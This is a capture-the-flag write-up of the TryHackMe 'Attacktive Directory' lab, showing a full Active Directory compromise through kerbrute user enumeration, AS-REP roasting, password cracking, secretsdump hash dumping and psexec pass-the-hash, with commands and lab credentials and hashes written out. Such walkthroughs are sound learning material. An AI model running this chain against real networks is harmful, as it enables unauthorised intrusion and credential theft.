Attacktive Directory ~ Try Hack Me

Finally completed my CEH Master certification and found myself lazing around so here we go :)

Attacktive Directory ~ Try Hack Me

Finally completed my CEH Master certification and found myself lazing around so here we go :)

I SUCK AT WINDOWS EXPLOITATION ~ Nee

Prerequisite

Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.

echo "10.10.117.127	tar.get" >> /etc/hosts

Okay now onto hacking!


Reconnaissance

As always, I fired off an NMAP scan against the target machine.

┌──(nee㉿kali)-[~]
└─$ nmap -Pn -sV -sC -p- -A tar.get 
Nmap scan report for tar.get (10.10.117.127)
Host is up (0.35s latency).
Not shown: 65508 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-10-05 08:45:57Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2020-10-05T08:48:26+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2020-10-04T08:35:54
|_Not valid after:  2021-04-05T08:35:54
|_ssl-date: 2020-10-05T08:48:41+00:00; 0s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
49788/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=10/5%Time=5F7ADD4A%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-10-05T08:48:27
|_  start_date: N/A

Most of the open ports and running services led me to believe that this was indeed a windows server.

  • DNS
  • Active Directory LDAP
  • SMB / RPC
  • RDP

Bruteforcing credentials

I was given 2 files that aided with the brute force attack.

I made use of a tool named kerbrute to perform the attack

┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ ./kerbrute_linux_amd64 userenum -d spookysec.local --dc 10.10.156.245 userlist.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 10/06/20 - Ronnie Flathers @ropnop

2020/10/06 04:49:07 >  Using KDC(s):
2020/10/06 04:49:07 >   10.10.156.245:88

2020/10/06 04:49:08 >  [+] VALID USERNAME:       [email protected]
2020/10/06 04:49:14 >  [+] VALID USERNAME:       [email protected]
2020/10/06 04:49:22 >  [+] VALID USERNAME:       [email protected]
2020/10/06 04:49:24 >  [+] VALID USERNAME:       [email protected]
2020/10/06 04:49:54 >  [+] VALID USERNAME:       [email protected]
2020/10/06 04:50:13 >  [+] VALID USERNAME:       [email protected]
2020/10/06 04:50:50 >  [+] VALID USERNAME:       [email protected]
2020/10/06 04:51:07 >  [+] VALID USERNAME:       [email protected]
2020/10/06 04:52:58 >  [+] VALID USERNAME:       [email protected]
2020/10/06 04:53:36 >  [+] VALID USERNAME:       [email protected]

I was able to find out crucial usernames through these attacks. I found out that there were accounts such as:

  • svc-admin
  • administrator
  • backup

I could possibly use one of these accounts to get into the machine.

Exploiting Kerberos

The exploit that was used for this is called ASREPRoasting. I recently learnt about Kerberoasting and it was very similar to this exploit. The only difference between  Kerberoasting and ASREPRoasting is that ASREPRoasting occurs when a user account has the privilege Does not require Pre-Authentication set. This technically means that the accounts does not need to provide valid identidication before requesting a kerberos ticket.

I performed this exploit with the use of Impacket. (Impacket/Examples/GetNPUsers.py)

┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ GetNPUsers.py spookysec.local/svc-admin -no-pass
Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for svc-admin
[email protected]:80f4807ece8bed030287d392722808dd$148464892db58fe257006835567004e0f3f2a856a4608a1cbce3d858251acfe7c41cf80c1d7ec54b0edad691871910c17564afd893c2cc534e88ab8b6b873e4eee228fcf947ede842452747e0fbdaf55ab1c475cceed283d48ddc5aa604ed8ee8ed8727b3b62f77f634c6e09ff719a53246356edef39f2fb8084b014c1fce8478079a956ce5384d5d1d7121b7173297e8a84e3c4914fd7c6d6618a9221cf3c96280c6ddea7f0ddba1541583bbbfc92b57fc1bd22011a7fd70477c6fd8daccc5d0cd88973a5c0607430e652113642a6de607617dd6866568fcad894ab9364902fd1c7670a7dfa1977ae02d62ff1c2593b35e0

I was presented with the asrep hash for the user account. Moving on, I had to just crack it with john and retrieve the password for that particular account. This is where the wordlist I was given at the begining came in handy!

┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ sudo john hash.txt --wordlist=passwordlist.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
management2005   ($krb5asrep$23$sv[email protected])
1g 0:00:00:00 DONE (2020-10-06 05:15) 100.0g/s 665600p/s 665600c/s 665600C/s horoscope..amy123
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Upon completion I got the password management2005 for the user account  [email protected]

Connecting to shares via admin account

Now that I had both the username and the password I used SMBClient to connect to the file shares that the machine offered.

┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ smbclient -L spookysec.local -U svc-admin
Enter WORKGROUP\svc-admin's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backup          Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share

Now that I had verified that I could access the shares, I tried accessing the backup folder

┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ smbclient \\\\10.10.156.245\\backup -U svc-admin                                                                                             1 ⨯
Enter WORKGROUP\svc-admin's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Apr  4 15:08:39 2020
  ..                                  D        0  Sat Apr  4 15:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 15:08:53 2020

                8247551 blocks of size 4096. 5269051 blocks available
smb: \> 

I was able to successfully connect to the share and noticed a file names backup_credentials.txt. I proceeded to download the file to my local machine and realized that it was base64 encoded.

smb: \> get backup_credentials.txt 
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> ^C
                                                                                                                                                     
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ ls                                                                                                                                         130 ⨯
backup_credentials.txt  hash.txt  kerbrute_linux_amd64  passwordlist.txt  userlist.txt
                                                                                                                                                     
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ cat backup_credentials.txt 
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw 

After decoding it, I realized that I got credentials to the backup account found couple steps ago.

CyberChef

Dumping hashes

Using the credentials I recovered from the previous step, I used Impacket again (but a different module) to dump all user account NTLM hashes & Kerberos keys.

┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ secretsdump.py spookysec.local/backup:'backup2517860'
Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: [Errno Connection error (spookysec.local/backup:backup2517860:445)] [Errno -2] Name or service not known
[*] Cleaning up... 
                                                                                                                                                     
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ secretsdump.py spookysec.local/backup:'backup2517860'@10.10.156.245 -just-dc
Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e4876a80a723612986d7609aa5ebc12b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:8bc3bdcaf0f70c78b7bda16b84032f51:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:c431e7e3555aeb5b63cbdfee3024d56f4b7f10eaba6c3f94d9a1524e76a26a49
Administrator:aes128-cts-hmac-sha1-96:f955ac2d89620b2a8dcd9837105445ff
Administrator:des-cbc-md5:6d5edfa173d9d6ae
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
krbtgt:des-cbc-md5:b94f97e97fabbf5d
spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
spookysec.local\paradox:des-cbc-md5:83988983f8b34019
spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:7403d3da9fbb21788d7ded46cfa217a336d219376bf22d5f4ae0bba232e91f06
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:1092c7b99ff5efd56ed960531d76647b
ATTACKTIVEDIREC$:des-cbc-md5:d69de55e08c4a845
[*] Cleaning up...

Accessing administrator account of the machine

Lastly, I made use of psexec to perform something called "passing-the-hash" and get into the admin account.

┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ psexec.py [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:e4876a80a723612986d7609aa5ebc12b
Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.156.245.....
[*] Found writable share ADMIN$
[*] Uploading file xLRsIsYU.exe
[*] Opening SVCManager on 10.10.156.245.....
[*] Creating service dfyb on 10.10.156.245.....
[*] Starting service dfyb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

And...I'm in.


That's the end of that box 😩. One of my first windows boxes! But turned out to be not too bad I guess :)